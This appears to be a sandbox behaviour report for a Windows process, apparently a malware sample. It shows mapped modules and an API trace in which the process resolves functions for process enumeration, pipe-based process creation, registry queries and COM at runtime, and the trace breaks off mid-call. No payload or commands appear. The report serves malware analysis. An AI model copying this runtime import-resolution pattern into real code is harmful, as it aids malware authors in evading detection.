0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1944 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1945 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1946 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1947 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1948 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1949 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1950 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1951 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1952 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1953 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1954 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1955 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1956 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1957 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1958 start_va = 0x7ffb281e0000 end_va = 0x7ffb28322fff monitored = 0 entry_point = 0x7ffb28208210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1959 start_va = 0x540000 end_va = 0x5fffff monitored = 0 entry_point = 0x560da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1960 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1961 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1962 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1963 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1964 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1965 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1966 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1967 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1968 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1969 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1970 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1971 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1972 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1973 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1974 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1975 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1976 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1977 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1978 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1979 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1980 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1981 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1982 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1983 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1984 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1985 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1986 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1987 start_va = 0x7ffb21040000 end_va = 0x7ffb21107fff monitored = 0 entry_point = 0x7ffb210813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1988 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1989 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1990 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1991 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1992 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1993 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1994 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1995 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1996 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1997 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1998 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1999 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2000 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2001 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2002 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2003 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2004 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2005 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2006 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2007 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2008 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2009 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2010 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2011 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2012 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2013 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2014 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2015 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2016 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2017 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2018 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2019 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2020 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2021 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2022 start_va = 0x7ffb126f0000 end_va = 0x7ffb12736fff monitored = 0 entry_point = 0x7ffb126f1d10 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 2023 start_va = 0x7ffb126b0000 end_va = 0x7ffb126effff monitored = 0 entry_point = 0x7ffb126bcbe0 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 2024 start_va = 0x7ffb26780000 end_va = 0x7ffb267dbfff monitored = 0 entry_point = 0x7ffb2679b720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2025 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2026 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2027 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2028 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2029 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2030 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2031 start_va = 0x2220000 end_va = 0x231ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 2032 start_va = 0x2340000 end_va = 0x234cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 2033 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2034 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 2035 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 2036 start_va = 0x4e0000 end_va = 0x4e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2037 start_va = 0x4f0000 end_va = 0x4f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 2038 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2039 start_va = 0x2500000 end_va = 0x2836fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 141 os_tid = 0x1384 [0189.838] ResetEvent (hEvent=0x8) returned 1 [0189.838] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.841] LoadLibraryW (lpLibFileName="KERNEL32.dll") returned 0x7ffb26230000 [0189.842] ResetEvent (hEvent=0x8) returned 1 [0189.842] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.847] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LeaveCriticalSection") returned 0x7ffb28b2eb00 [0189.847] ResetEvent (hEvent=0x8) returned 1 [0189.847] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.849] GetProcAddress (hModule=0x7ffb26230000, lpProcName="EnterCriticalSection") returned 0x7ffb28b2e600 [0189.849] ResetEvent (hEvent=0x8) returned 1 [0189.850] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.852] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0189.852] ResetEvent (hEvent=0x8) returned 1 [0189.852] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.857] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrcmpiW") returned 0x7ffb2624d6c0 [0189.857] ResetEvent (hEvent=0x8) returned 1 [0189.857] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.860] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32NextW") returned 0x7ffb26251040 [0189.860] ResetEvent (hEvent=0x8) returned 1 [0189.860] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.864] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32FirstW") returned 0x7ffb26256a40 [0189.864] ResetEvent (hEvent=0x8) returned 1 [0189.864] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.867] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateToolhelp32Snapshot") returned 0x7ffb2625e800 [0189.867] ResetEvent (hEvent=0x8) returned 1 [0189.867] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.869] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FindClose") returned 0x7ffb2625d900 [0189.869] ResetEvent (hEvent=0x8) returned 1 [0189.869] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.872] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FindNextFileW") returned 0x7ffb2625d9c0 [0189.872] ResetEvent (hEvent=0x8) returned 1 [0189.872] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.875] GetProcAddress (hModule=0x7ffb26230000, lpProcName="FindFirstFileW") returned 0x7ffb2625d980 [0189.875] ResetEvent (hEvent=0x8) returned 1 [0189.875] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.879] GetProcAddress (hModule=0x7ffb26230000, lpProcName="ReadFile") returned 0x7ffb2625dbd0 [0189.879] ResetEvent (hEvent=0x8) returned 1 [0189.879] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.882] GetProcAddress (hModule=0x7ffb26230000, lpProcName="PeekNamedPipe") returned 0x7ffb26276350 [0189.882] ResetEvent (hEvent=0x8) returned 1 [0189.882] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.884] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetExitCodeProcess") returned 0x7ffb26253c20 [0189.884] ResetEvent (hEvent=0x8) returned 1 [0189.884] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.887] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateProcessW") returned 0x7ffb26253b00 [0189.887] ResetEvent (hEvent=0x8) returned 1 [0189.887] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.889] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetSystemDirectoryW") returned 0x7ffb262503c0 [0189.889] ResetEvent (hEvent=0x8) returned 1 [0189.889] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.894] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SetHandleInformation") returned 0x7ffb2625d680 [0189.894] ResetEvent (hEvent=0x8) returned 1 [0189.894] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.897] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreatePipe") returned 0x7ffb26258db0 [0189.897] ResetEvent (hEvent=0x8) returned 1 [0189.897] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.899] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WideCharToMultiByte") returned 0x7ffb2624b490 [0189.899] ResetEvent (hEvent=0x8) returned 1 [0189.899] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.903] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrlenW") returned 0x7ffb2624d6d0 [0189.903] ResetEvent (hEvent=0x8) returned 1 [0189.903] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.905] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Sleep") returned 0x7ffb2624b7b0 [0189.905] ResetEvent (hEvent=0x8) returned 1 [0189.905] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.908] GetProcAddress (hModule=0x7ffb26230000, lpProcName="ExitProcess") returned 0x7ffb26254d80 [0189.908] ResetEvent (hEvent=0x8) returned 1 [0189.908] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.914] GetProcAddress (hModule=0x7ffb26230000, lpProcName="lstrcmpiA") returned 0x7ffb26250c80 [0189.914] ResetEvent (hEvent=0x8) returned 1 [0189.914] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.917] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CloseHandle") returned 0x7ffb2625d650 [0189.917] ResetEvent (hEvent=0x8) returned 1 [0189.917] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.919] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetTickCount") returned 0x7ffb2624b4c0 [0189.919] ResetEvent (hEvent=0x8) returned 1 [0189.919] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.922] GetProcAddress (hModule=0x7ffb26230000, lpProcName="MultiByteToWideChar") returned 0x7ffb2624d500 [0189.922] ResetEvent (hEvent=0x8) returned 1 [0189.922] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.929] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x7ffb2625d750 [0189.929] ResetEvent (hEvent=0x8) returned 1 [0189.929] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.932] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CreateThread") returned 0x7ffb262516f0 [0189.932] ResetEvent (hEvent=0x8) returned 1 [0189.932] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.935] LoadLibraryW (lpLibFileName="USER32.dll") returned 0x7ffb26090000 [0189.952] ResetEvent (hEvent=0x8) returned 1 [0189.952] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.954] GetProcAddress (hModule=0x7ffb26090000, lpProcName="wsprintfA") returned 0x7ffb260b4d50 [0189.954] ResetEvent (hEvent=0x8) returned 1 [0189.955] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.957] GetProcAddress (hModule=0x7ffb26090000, lpProcName="wsprintfW") returned 0x7ffb260b81e0 [0189.957] ResetEvent (hEvent=0x8) returned 1 [0189.957] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.962] LoadLibraryW (lpLibFileName="ADVAPI32.dll") returned 0x7ffb28a50000 [0189.967] ResetEvent (hEvent=0x8) returned 1 [0189.967] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.969] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyExW") returned 0x7ffb28a66420 [0189.970] ResetEvent (hEvent=0x8) returned 1 [0189.970] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.974] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegQueryInfoKeyW") returned 0x7ffb28a66590 [0189.976] ResetEvent (hEvent=0x8) returned 1 [0189.976] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.979] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegEnumKeyExW") returned 0x7ffb28a66280 [0189.979] ResetEvent (hEvent=0x8) returned 1 [0189.979] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.981] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegGetValueW") returned 0x7ffb28a679a0 [0189.981] ResetEvent (hEvent=0x8) returned 1 [0189.981] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.984] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0189.984] ResetEvent (hEvent=0x8) returned 1 [0189.984] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0189.987] LoadLibraryW (lpLibFileName="SHELL32.dll") returned 0x7ffb267e0000 [0190.016] ResetEvent (hEvent=0x8) returned 1 [0190.017] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.020] GetProcAddress (hModule=0x7ffb267e0000, lpProcName="SHGetFolderPathW") returned 0x7ffb268734c0 [0190.020] ResetEvent (hEvent=0x8) returned 1 [0190.020] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.025] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x7ffb281e0000 [0190.030] ResetEvent (hEvent=0x8) returned 1 [0190.030] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.034] GetProcAddress (hModule=0x7ffb281e0000, lpProcName="CoSetProxyBlanket") returned 0x7ffb27e75b80 [0190.034] ResetEvent (hEvent=0x8) returned 1 [0190.034] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.037] GetProcAddress (hModule=0x7ffb281e0000, lpProcName="IIDFromString") returned 0x7ffb27e417b0 [0190.037] ResetEvent (hEvent=0x8) returned 1 [0190.037] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0190.041] GetProcAddress (hModule=0x7ffb281e0000, lpProcName="CoCreateInstance") returned 0x7ffb27e9fb70 [0190.041] ResetEvent (hEvent=0x8) returned 1 [0190.042] SignalObjectAndWait 